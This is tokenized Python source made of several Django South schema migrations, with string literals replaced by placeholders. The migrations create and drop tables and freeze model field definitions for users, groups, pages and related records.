'<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : u"<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( u'<STR_LIT>' , ( <EOL> ( u'<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , unique = True , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ) ) <EOL> db . send_create_signal ( u'<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( u'<STR_LIT>' ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:content>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:content>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> depends_on = ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ) <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , null = True , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> 